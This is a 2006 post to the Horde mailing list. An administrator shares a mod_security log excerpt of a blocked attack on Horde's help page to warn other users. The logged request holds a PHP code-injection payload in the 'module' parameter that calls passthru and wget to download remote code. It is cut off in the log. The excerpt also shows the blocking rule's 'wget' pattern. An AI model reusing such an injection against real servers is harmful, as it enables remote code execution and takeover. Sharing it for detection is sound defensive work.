[horde] Horde vulnerable to buffer overflows?
Alejandro Lengua
alejandro.lengua at gmail.com
Sat Apr 29 09:51:38 PDT 2006
Recently found several of this requests in the log of the mod_security
module installed in my Apache server.
It looks like someone trying to install something in my server using wget.
I am not sure if Horde is vulnerable without the help of mod_security.
Anyway I post this here, to help others identify a vulnerable system.
Beware!
Here follows the extract of my log file. I hope it can help others.
==ba743052==============================
Request: 69.65.102.49 216.65.30.153 - - [29/Apr/2006:05:43:15 -0400] "GET //hord
----------------------------------------
GET //horde//services/help/?show=about&module=;".passthru("wget%20http:".chr(47)
Accept: */*
Connection: close
Host: 69.65.102.49
mod_security-message: Access denied with code 403. Pattern match "wget\\x20" at
mod_security-action: 403
--
Atentamente / Kind regards
Alejandro Lengua,
More information about the horde
mailing list